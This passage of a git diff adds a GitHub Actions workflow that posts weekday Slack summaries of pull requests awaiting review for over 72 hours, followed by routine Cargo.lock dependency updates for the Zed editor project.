/dev/null +++ b/.github/workflows/stale-pr-reminder.yml @@ -0,0 +1,115 @@ +# Stale PR Review Reminder +# +# Runs daily on weekdays (second run at 8 PM UTC disabled during rollout) and posts a Slack summary of open PRs that +# have been awaiting review for more than 72 hours. Team-level signal only — +# no individual shaming. +# +# Security note: No untrusted input is interpolated into shell commands. +# All PR metadata is read via gh API + jq. +# +# Required secrets: +# SLACK_WEBHOOK_PR_REVIEW_BOT - Incoming webhook URL for the #pr-review-ops channel + +name: Stale PR Review Reminder + +on: + schedule: + - cron: "0 14 * * 1-5" # 2 PM UTC weekdays + # - cron: "0 20 * * 1-5" # 8 PM UTC weekdays — enable after initial rollout + workflow_dispatch: {} + +permissions: + contents: read + pull-requests: read + +jobs: + check-stale-prs: + if: github.repository_owner == 'zed-industries' + runs-on: ubuntu-latest + timeout-minutes: 5 + env: + REPO: ${{ github.repository }} + # Only surface PRs created on or after this date. Update this if the + # review process enforcement date changes. 
+ PROCESS_START_DATE: "2026-03-19T00:00:00Z" + steps: + - name: Find PRs awaiting review longer than 72h + id: stale + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + CUTOFF=$(date -u -v-72H +%Y-%m-%dT%H:%M:%SZ 2>/dev/null \ + || date -u -d '72 hours ago' +%Y-%m-%dT%H:%M:%SZ) + + # Get open, non-draft PRs with pending review requests, created before cutoff + # but after the review process start date (to exclude pre-existing backlog) + gh api --paginate \ + "repos/${REPO}/pulls?state=open&sort=updated&direction=asc&per_page=100" \ + --jq "[ + .[] | + select(.draft == false) | + select(.created_at > \"$PROCESS_START_DATE\") | + select(.created_at < \"$CUTOFF\") | + select((.requested_reviewers | length > 0) or (.requested_teams | length > 0)) + ]" > /tmp/candidates.json + + # Filter to PRs with zero approving reviews + jq -r '.[].number' /tmp/candidates.json | while read -r PR_NUMBER; do + APPROVALS=$(gh api \ + "repos/${REPO}/pulls/${PR_NUMBER}/reviews" \ + --jq "[.[] | select(.state == \"APPROVED\")] | length" 2>/dev/null || echo "0") + + if [ "$APPROVALS" -eq 0 ]; then + jq ".[] | select(.number == ${PR_NUMBER}) | {number, title, author: .user.login, created_at}" \ + /tmp/candidates.json + fi + done | jq -s '.' > /tmp/awaiting.json + + COUNT=$(jq 'length' /tmp/awaiting.json) + echo "count=$COUNT" >> "$GITHUB_OUTPUT" + + - name: Notify Slack + if: steps.stale.outputs.count != '0' + env: + SLACK_WEBHOOK_PR_REVIEW_BOT: ${{ secrets.SLACK_WEBHOOK_PR_REVIEW_BOT }} + COUNT: ${{ steps.stale.outputs.count }} + run: | + # Build Block Kit payload from JSON — no shell interpolation of PR titles. + # Why jq? PR titles are attacker-controllable input. By reading them + # through jq -r from the JSON file and passing the result to jq --arg, + # the content stays safely JSON-encoded in the final payload. 
+ PRS=$(jq -r '.[] | "• — \(.title) (by \(.author), opened \(.created_at | split("T")[0]))"' /tmp/awaiting.json) + + jq -n \ + --arg count "$COUNT" \ + --arg prs "$PRS" \ + '{ + text: ($count + " PR(s) awaiting review for >72 hours"), + blocks: [ + { + type: "section", + text: { + type: "mrkdwn", + text: (":hourglass_flowing_sand: *" + $count + " PR(s) Awaiting Review >72 Hours*") + } + }, + { + type: "section", + text: { type: "mrkdwn", text: $prs } + }, + { type: "divider" }, + { + type: "context", + elements: [{ + type: "mrkdwn", + text: "PRs awaiting review are surfaced daily. Reviewers: pick one up or reassign." + }] + } + ] + }' | \ + curl -s -X POST "$SLACK_WEBHOOK_PR_REVIEW_BOT" \ + -H 'Content-Type: application/json' \ + -d @- +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/Cargo.lock b/Cargo.lock index 30cca7cafd7d62623b2c52c6e013616a6db1b90c..46d4732898427f1d1f2e733e24a61f15f0714d03 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -228,9 +228,9 @@ dependencies = [ [[package]] name = "agent-client-protocol" -version = "0.9.4" +version = "0.10.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2659b1089101b15db31137710159421cb44785ecdb5ba784be3b4a6f8cb8a475" +checksum = "9c56a59cf6315e99f874d2c1f96c69d2da5ffe0087d211297fc4a41f849770a2" dependencies = [ "agent-client-protocol-schema", "anyhow", @@ -245,16 +245,16 @@ dependencies = [ [[package]] name = "agent-client-protocol-schema" -version = "0.10.8" +version = "0.11.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "44bc1fef9c32f03bce2ab44af35b6f483bfd169bf55cc59beeb2e3b1a00ae4d1" +checksum = "e0497b9a95a404e35799904835c57c6f8c69b9d08ccfd3cb5b7d746425cd6789" dependencies = [ "anyhow", "derive_more", "schemars", "serde", "serde_json", - "strum 0.27.2", + "strum 0.28.0", ] [[package]] @@ -272,6 +272,7 @@ dependencies = [ "collections", "credentials_provider", "env_logger 0.11.8", + "feature_flags", "fs", "futures 0.3.31", "google_ai", @@ 
-334,7 +335,6 @@ dependencies = [ "agent_settings", "ai_onboarding", "anyhow", - "arrayvec", "assistant_slash_command", "assistant_slash_commands", "assistant_text_thread", @@ -363,6 +363,7 @@ dependencies = [ "git", "gpui", "gpui_tokio", + "heapless", "html_to_markdown", "http_client", "image", @@ -662,7 +663,6 @@ dependencies = [ "schemars", "serde", "serde_json", - "settings", "strum 0.27.2", "thiserror 2.0.17", ] @@ -734,9 +734,6 @@ name = "arrayvec" version = "0.7.6" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7c02d123df017efcdfbd739ef81735b36c5ba83ec3c59c80a9d7ecc718f92e50" -dependencies = [ - "serde", -] [[package]] name = "as-raw-xcb-connection" @@ -1282,7 +1279,6 @@ name = "audio" version = "0.1.0" dependencies = [ "anyhow", - "async-tar", "collections", "cpal", "crossbeam", @@ -1294,7 +1290,6 @@ dependencies = [ "rodio", "serde", "settings", - "smol", "thiserror 2.0.17", "util", ] @@ -2074,7 +2069,16 @@ version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "08807e080ed7f9d5433fa9b275196cfc35414f66a0c79d864dc51a0d825231a3" dependencies = [ - "bit-vec", + "bit-vec 0.8.0", +] + +[[package]] +name = "bit-set" +version = "0.9.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "34ddef2995421ab6a5c779542c81ee77c115206f4ad9d5a8e05f4ff49716a3dd" +dependencies = [ + "bit-vec 0.9.1", ] [[package]] @@ -2083,6 +2087,12 @@ version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5e764a1d40d510daf35e07be9eb06e75770908c27d411ee6c92109c9840eaaf7" +[[package]] +name = "bit-vec" +version = "0.9.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b71798fca2c1fe1086445a7258a4bc81e6e49dcd24c8d0dd9a1e57395b603f51" + [[package]] name = "bit_field" version = "0.10.3" @@ -2194,7 +2204,7 @@ version = "3.8.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = 
"89ec27229c38ed0eb3c0feee3d2c1d6a4379ae44f418a29a658890e062d8f365" dependencies = [ - "darling", + "darling 0.21.3", "ident_case", "prettyplease", "proc-macro2", @@ -2460,7 +2470,7 @@ version = "0.25.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "9225bdcf4e4a9a4c08bf16607908eb2fbf746828d5e0b5e019726dbf6571f201" dependencies = [ - "darling", + "darling 0.20.11", "proc-macro2", "quote", "syn 2.0.117", @@ -3164,17 +3174,6 @@ dependencies = [ "objc", ] -[[package]] -name = "codespan-reporting" -version = "0.12.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fe6d2e5af09e8c8ad56c969f2157a3d4238cebc7c55f0a517728c38f7b200f81" -dependencies = [ - "serde", - "termcolor", - "unicode-width", -] - [[package]] name = "codespan-reporting" version = "0.13.0" @@ -3320,6 +3319,7 @@ dependencies = [ "futures 0.3.31", "fuzzy", "gpui", + "livekit_client", "log", "menu", "notifications", @@ -3339,6 +3339,7 @@ dependencies = [ "ui", "util", "workspace", + "zed_actions", ] [[package]] @@ -3570,6 +3571,7 @@ version = "0.1.0" dependencies = [ "anyhow", "async-trait", + "base64 0.22.1", "collections", "futures 0.3.31", "gpui", @@ -3578,14 +3580,17 @@ dependencies = [ "net", "parking_lot", "postage", + "rand 0.9.2", "schemars", "serde", "serde_json", "settings", + "sha2", "slotmap", "smol", "tempfile", "terminal", + "tiny_http", "url", "util", ] @@ -4397,7 +4402,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d74b6bcf49ebbd91f1b1875b706ea46545032a14003b5557b7dfa4bbeba6766e" dependencies = [ "cc", - "codespan-reporting 0.13.0", + "codespan-reporting", "indexmap", "proc-macro2", "quote", @@ -4412,7 +4417,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "94ca2ad69673c4b35585edfa379617ac364bccd0ba0adf319811ba3a74ffa48a" dependencies = [ "clap", - "codespan-reporting 0.13.0", + "codespan-reporting", "indexmap", "proc-macro2", "quote", @@ -4514,8 +4519,18 @@ version = 
"0.20.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "fc7f46116c46ff9ab3eb1597a45688b6715c6e628b5c133e288e709a29bcb4ee" dependencies = [ - "darling_core", - "darling_macro", + "darling_core 0.20.11", + "darling_macro 0.20.11", +] + +[[package]] +name = "darling" +version = "0.21.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9cdf337090841a411e2a7f3deb9187445851f91b309c0c0a29e05f74a00a48c0" +dependencies = [ + "darling_core 0.21.3", + "darling_macro 0.21.3", ] [[package]] @@ -4532,13 +4547,38 @@ dependencies = [ "syn 2.0.117", ] +[[package]] +name = "darling_core" +version = "0.21.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1247195ecd7e3c85f83c8d2a366e4210d588e802133e1e355180a9870b517ea4" +dependencies = [ + "fnv", + "ident_case", + "proc-macro2", + "quote", + "strsim", + "syn 2.0.117", +] + [[package]] name = "darling_macro" version = "0.20.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "fc34b93ccb385b40dc71c6fceac4b2ad23662c7eeb248cf10d529b7e055b6ead" dependencies = [ - "darling_core", + "darling_core 0.20.11", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "darling_macro" +version = "0.21.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d38308df82d1080de0afee5d069fa14b0326a88c14f15c5ccda35b4a6c414c81" +dependencies = [ + "darling_core 0.21.3", "quote", "syn 2.0.117", ] @@ -4582,6 +4622,7 @@ dependencies = [ "anyhow", "gpui", "indoc", + "inventory", "log", "paths", "release_channel", @@ -4590,6 +4631,7 @@ dependencies = [ "sqlez_macros", "tempfile", "util", + "uuid", "zed_env_vars", ] @@ -4809,11 +4851,11 @@ dependencies = [ [[package]] name = "derive_setters" -version = "0.1.8" +version = "0.1.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ae5c625eda104c228c06ecaf988d1c60e542176bd7a490e60eeda3493244c0c9" +checksum = 
"b7e6f6fa1f03c14ae082120b84b3c7fbd7b8588d924cf2d7c3daf9afd49df8b9" dependencies = [ - "darling", + "darling 0.21.3", "proc-macro2", "quote", "syn 2.0.117", @@ -5196,7 +5238,6 @@ version = "0.1.0" dependencies = [ "ai_onboarding", "anyhow", - "arrayvec", "brotli", "buffer_diff", "client", @@ -5214,6 +5255,7 @@ dependencies = [ "fs", "futures 0.3.31", "gpui", + "heapless", "indoc", "itertools 0.14.0", "language", @@ -5263,6 +5305,7 @@ dependencies = [ "client", "cloud_llm_client", "collections", + "db", "debug_adapter_extension", "dirs 4.0.0", "edit_prediction", @@ -6143,7 +6186,18 @@ version = "0.16.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "998b056554fbe42e03ae0e152895cd1a7e1002aec800fdc6635d20270260c46f" dependencies = [ - "bit-set", + "bit-set 0.8.0", + "regex-automata", + "regex-syntax", +] + +[[package]] +name = "fancy-regex" +version = "0.17.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "72cf461f865c862bb7dc573f643dd6a2b6842f7c30b07882b56bd148cc2761b8" +dependencies = [ + "bit-set 0.8.0", "regex-automata", "regex-syntax", ] @@ -6213,7 +6267,6 @@ dependencies = [ name = "feature_flags" version = "0.1.0" dependencies = [ - "futures 0.3.31", "gpui", ] @@ -6244,6 +6297,8 @@ name = "file_finder" version = "0.1.0" dependencies = [ "anyhow", + "channel", + "client", "collections", "ctor", "editor", @@ -6257,10 +6312,10 @@ dependencies = [ "pretty_assertions", "project", "project_panel", + "remote_connection", "serde", "serde_json", "settings", - "text", "theme", "ui", "util", @@ -6547,6 +6602,7 @@ dependencies = [ "async-trait", "cocoa 0.26.0", "collections", + "dunce", "fs", "futures 0.3.31", "git", @@ -7142,7 +7198,7 @@ dependencies = [ [[package]] name = "gh-workflow" version = "0.8.0" -source = "git+https://github.com/zed-industries/gh-workflow?rev=c9eac0ed361583e1072860d96776fa52775b82ac#c9eac0ed361583e1072860d96776fa52775b82ac" +source = 
"git+https://github.com/zed-industries/gh-workflow?rev=37f3c0575d379c218a9c455ee67585184e40d43f#37f3c0575d379c218a9c455ee67585184e40d43f" dependencies = [ "async-trait", "derive_more", @@ -7153,13 +7209,13 @@ dependencies = [ "serde", "serde_json", "serde_yaml", - "strum_macros", + "strum_macros 0.27.2", ] [[package]] name = "gh-workflow-macros" version = "0.8.0" -source = "git+https://github.com/zed-industries/gh-workflow?rev=c9eac0ed361583e1072860d96776fa52775b82ac#c9eac0ed361583e1072860d96776fa52775b82ac" +source = "git+https://github.com/zed-industries/gh-workflow?rev=37f3c0575d379c218a9c455ee67585184e40d43f#37f3c0575d379c218a9c455ee67585184e40d43f" dependencies = [ "heck 0.5.0", "quote", @@ -7319,6 +7375,7 @@ dependencies = [ "db", "editor", "feature_flags", + "file_icons", "futures 0.3.31", "fuzzy", "git", @@ -7455,9 +7512,9 @@ dependencies = [ [[package]] name = "glow" -version = "0.16.0" +version = "0.17.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c5e5ea60d70410161c8bf5da3fdfeaa1c72ed2c15f8bbb9d19fe3a4fad085f08" +checksum = "29038e1c483364cc6bb3cf78feee1816002e127c331a1eec55a4d202b9e1adb5" dependencies = [ "js-sys", "slotmap", @@ -7483,6 +7540,7 @@ dependencies = [ "indoc", "language", "menu", + "multi_buffer", "project", "rope", "serde", @@ -7609,7 +7667,7 @@ dependencies = [ "mach2 0.5.0", "media", "metal", - "naga 28.0.0", + "naga 29.0.0 (registry+https://github.com/rust-lang/crates.io-index)", "num_cpus", "objc", "objc2", @@ -7969,6 +8027,15 @@ dependencies = [ "smallvec", ] +[[package]] +name = "hash32" +version = "0.3.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "47d60b12902ba28e2730cd37e95b8c9223af2808df9e902d4df49588d1470606" +dependencies = [ + "byteorder", +] + [[package]] name = "hashbrown" version = "0.12.3" @@ -8053,6 +8120,16 @@ dependencies = [ "http 0.2.12", ] +[[package]] +name = "heapless" +version = "0.9.2" +source = 
"registry+https://github.com/rust-lang/crates.io-index" +checksum = "2af2455f757db2b292a9b1768c4b70186d443bcb3b316252d6b540aec1cd89ed" +dependencies = [ + "hash32", + "stable_deref_trait", +] + [[package]] name = "heck" version = "0.3.3" @@ -9114,7 +9191,7 @@ dependencies = [ "bytecount", "data-encoding", "email_address", - "fancy-regex", + "fancy-regex 0.16.2", "fraction", "getrandom 0.3.4", "idna", @@ -9408,7 +9485,6 @@ dependencies = [ "aws_http_client", "base64 0.22.1", "bedrock", - "chrono", "client", "cloud_api_types", "cloud_llm_client", @@ -9437,6 +9513,7 @@ dependencies = [ "ollama", "open_ai", "open_router", + "opencode", "partial-json-fixer", "pretty_assertions", "release_channel", @@ -9722,7 +9799,7 @@ dependencies = [ [[package]] name = "libwebrtc" version = "0.3.26" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e" dependencies = [ "cxx", "glib", @@ -9820,7 +9897,7 @@ checksum = "11d3d7f243d5c5a8b9bb5d6dd2b1602c0cb0b9db1621bafc7ed66e35ff9fe092" [[package]] name = "livekit" version = "0.7.32" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e" dependencies = [ "base64 0.22.1", "bmrng", @@ -9846,7 +9923,7 @@ dependencies = [ [[package]] name = "livekit-api" version = "0.4.14" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459" +source = 
"git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e" dependencies = [ "base64 0.21.7", "futures-util", @@ -9873,7 +9950,7 @@ dependencies = [ [[package]] name = "livekit-protocol" version = "0.7.1" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e" dependencies = [ "futures-util", "livekit-runtime", @@ -9889,7 +9966,7 @@ dependencies = [ [[package]] name = "livekit-runtime" version = "0.4.0" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e" dependencies = [ "tokio", "tokio-stream", @@ -9944,8 +10021,10 @@ dependencies = [ "settings", "simplelog", "smallvec", + "tokio", "ui", "util", + "webrtc-sys", "zed-scap", ] @@ -10199,7 +10278,6 @@ dependencies = [ "async-recursion", "collections", "editor", - "fs", "gpui", "html5ever 0.27.0", "language", @@ -10211,6 +10289,7 @@ dependencies = [ "pretty_assertions", "pulldown-cmark 0.13.0", "settings", + "stacksafe", "theme", "ui", "urlencoding", @@ -10710,16 +10789,16 @@ checksum = "e5ce46fe64a9d73be07dcbe690a38ce1b293be448fd8ce1e6c1b8062c9f72c6a" [[package]] name = "naga" -version = "28.0.0" +version = "29.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "618f667225063219ddfc61251087db8a9aec3c3f0950c916b614e403486f1135" +checksum = "85b4372fed0bd362d646d01b6926df0e837859ccc522fed720c395e0460f29c8" dependencies = [ "arrayvec", - "bit-set", + "bit-set 0.9.1", "bitflags 2.10.0", "cfg-if", "cfg_aliases 
0.2.1", - "codespan-reporting 0.12.0", + "codespan-reporting", "half", "hashbrown 0.16.1", "hexf-parse", @@ -10735,15 +10814,15 @@ dependencies = [ [[package]] name = "naga" -version = "28.0.1" -source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "arrayvec", - "bit-set", + "bit-set 0.9.1", "bitflags 2.10.0", "cfg-if", "cfg_aliases 0.2.1", - "codespan-reporting 0.12.0", + "codespan-reporting", "half", "hashbrown 0.16.1", "hexf-parse", @@ -11273,9 +11352,9 @@ dependencies = [ [[package]] name = "objc2-audio-toolbox" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "10cbe18d879e20a4aea544f8befe38bcf52255eb63d3f23eca2842f3319e4c07" +checksum = "6948501a91121d6399b79abaa33a8aa4ea7857fe019f341b8c23ad6e81b79b08" dependencies = [ "bitflags 2.10.0", "libc", @@ -11288,9 +11367,9 @@ dependencies = [ [[package]] name = "objc2-avf-audio" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bfc1d11521c211a7ebe17739fc806719da41f56c6b3f949d9861b459188ce910" +checksum = "13a380031deed8e99db00065c45937da434ca987c034e13b87e4441f9e4090be" dependencies = [ "objc2", "objc2-foundation", @@ -11298,9 +11377,9 @@ dependencies = [ [[package]] name = "objc2-core-audio" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ca44961e888e19313b808f23497073e3f6b3c22bb485056674c8b49f3b025c82" +checksum = "e1eebcea8b0dbff5f7c8504f3107c68fc061a3eb44932051c8cf8a68d969c3b2" dependencies = [ "dispatch2", "objc2", @@ -11340,9 +11419,9 @@ checksum = "ef25abbcd74fb2609453eb695bd2f860d389e457f67dc17cafc8b8cbc89d0c33" [[package]] name = "objc2-foundation" -version = "0.3.1" +version = 
"0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "900831247d2fe1a09a683278e5384cfb8c80c79fe6b166f9d14bfdde0ea1b03c" +checksum = "e3e0adef53c21f888deb4fa59fc59f7eb17404926ee8a6f59f5df0fd7f9f3272" dependencies = [ "bitflags 2.10.0", "block2", @@ -11363,9 +11442,9 @@ dependencies = [ [[package]] name = "objc2-metal" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7f246c183239540aab1782457b35ab2040d4259175bd1d0c58e46ada7b47a874" +checksum = "a0125f776a10d00af4152d74616409f0d4a2053a6f57fa5b7d6aa2854ac04794" dependencies = [ "bitflags 2.10.0", "block2", @@ -11375,6 +11454,19 @@ dependencies = [ "objc2-foundation", ] +[[package]] +name = "objc2-quartz-core" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "96c1358452b371bf9f104e21ec536d37a650eb10f7ee379fff67d2e08d537f1f" +dependencies = [ + "bitflags 2.10.0", + "objc2", + "objc2-core-foundation", + "objc2-foundation", + "objc2-metal", +] + [[package]] name = "objc_exception" version = "0.1.2" @@ -11573,6 +11665,20 @@ dependencies = [ "thiserror 2.0.17", ] +[[package]] +name = "opencode" +version = "0.1.0" +dependencies = [ + "anyhow", + "futures 0.3.31", + "google_ai", + "http_client", + "schemars", + "serde", + "serde_json", + "strum 0.27.2", +] + [[package]] name = "opener" version = "0.7.2" @@ -12082,7 +12188,7 @@ dependencies = [ [[package]] name = "pet" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "clap", "env_logger 0.10.2", @@ -12113,14 +12219,18 @@ dependencies = [ "pet-virtualenvwrapper", "pet-windows-registry", "pet-windows-store", + "pet-winpython", "serde", 
"serde_json", + "tracing", + "tracing-subscriber", + "winresource", ] [[package]] name = "pet-conda" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "lazy_static", @@ -12130,6 +12240,7 @@ dependencies = [ "pet-fs", "pet-python-utils", "pet-reporter", + "rayon", "regex", "serde", "serde_json", @@ -12139,7 +12250,7 @@ dependencies = [ [[package]] name = "pet-core" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "clap", "lazy_static", @@ -12154,7 +12265,7 @@ dependencies = [ [[package]] name = "pet-env-var-path" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12170,8 +12281,9 @@ dependencies = [ [[package]] name = "pet-fs" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ + "glob", "log", "msvc_spectre_libs", 
"windows-sys 0.59.0", @@ -12180,7 +12292,7 @@ dependencies = [ [[package]] name = "pet-global-virtualenvs" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12193,7 +12305,7 @@ dependencies = [ [[package]] name = "pet-homebrew" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12203,6 +12315,7 @@ dependencies = [ "pet-fs", "pet-python-utils", "pet-virtualenv", + "rayon", "regex", "serde", "serde_json", @@ -12211,7 +12324,7 @@ dependencies = [ [[package]] name = "pet-jsonrpc" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "log", @@ -12224,7 +12337,7 @@ dependencies = [ [[package]] name = "pet-linux-global-python" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", 
@@ -12237,7 +12350,7 @@ dependencies = [ [[package]] name = "pet-mac-commandlinetools" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12250,7 +12363,7 @@ dependencies = [ [[package]] name = "pet-mac-python-org" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12263,7 +12376,7 @@ dependencies = [ [[package]] name = "pet-mac-xcode" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12276,20 +12389,22 @@ dependencies = [ [[package]] name = "pet-pipenv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ + "lazy_static", "log", "msvc_spectre_libs", 